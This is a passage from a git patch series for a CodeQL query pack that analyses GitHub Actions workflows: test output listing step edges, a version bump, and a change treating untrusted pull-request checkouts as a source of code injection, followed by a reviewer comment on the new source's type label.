.github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | 
.github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | -| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | 
.github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | -| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | | .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | 
.github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | -| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | | .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | -| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | -| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:122:9:125:6 | Uses Step | 
.github/workflows/level0.yml:125:9:129:6 | Uses Step | -| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | -| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | -| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | 
.github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | 
.github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 
| Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | -| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | -| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | | .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | 
Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| 
.github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | -| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | -| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | 
.github/workflows/test6.yml:39:9:43:6 | Run Step | -| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:33:9:36:6 | Run Step | 
.github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | -| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run 
Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select From 76ded33280cf2a6ea8c8c2abb05bb37dc6b41a39 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:29:36 +0200 Subject: [PATCH 0418/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5cf222d25c..6b17e77e063 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.20 +version: 0.1.21 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6def1dfc0c8..d17bc34b9ab 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.20 +version: 0.1.21 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc39249f924d5a8ed2a5ee5584a084b617543144 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 15 Jul 2024 21:00:28 +0200 Subject: [PATCH 0419/1267] feat(queries): Consider untrusted checkout as a source for code injections --- .../codeql/actions/dataflow/FlowSources.qll | 10 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 37 ++++++++++++++----- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 16 +++++--- ql/src/qlpack.yml | 2 +- .../.github/workflows/untrusted_checkout1.yml | 15 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++ .../CWE-094/CodeInjectionMedium.expected | 7 ++++ 8 files changed, 79 insertions(+), 18 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 31cf33782b0..9f91af470b2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -1,4 +1,5 @@ private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.config.Config private import codeql.actions.dataflow.ExternalFlow @@ -112,6 +113,15 @@ private class ArtifactSource extends RemoteFlowSource { override string getSourceType() { result = "artifact" } } +/** + * A file from an untrusted checkout. + */ +private class CheckoutSource extends RemoteFlowSource { + CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } +} + /** * A list of file names returned by dorny/paths-filter. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3caf80b7ca8..e16bc00f8ea 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery /** * A unit class for adding additional taint steps. @@ -161,7 +162,11 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, UntrustedArtifactDownloadStep download, string content, string key, string value | + exists(Run run, Step artifact, string content, string key, string value | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | 
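Review bot: `CheckoutSource.getSourceType()` returns `"artifact"`, the same label as `ArtifactSource` directly above it, although its QLDoc describes a file from an untrusted checkout. Anything that keys on the source type (alert text, severity split, source filters) then cannot tell a PR-head checkout from an artifact download. If reusing the label is deliberate so that existing `"artifact"` consumers pick these sources up, a one-line comment saying so would prevent a later "fix". Otherwise return a distinct value and check the consumers of `getSourceType()`, which are outside this hunk.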
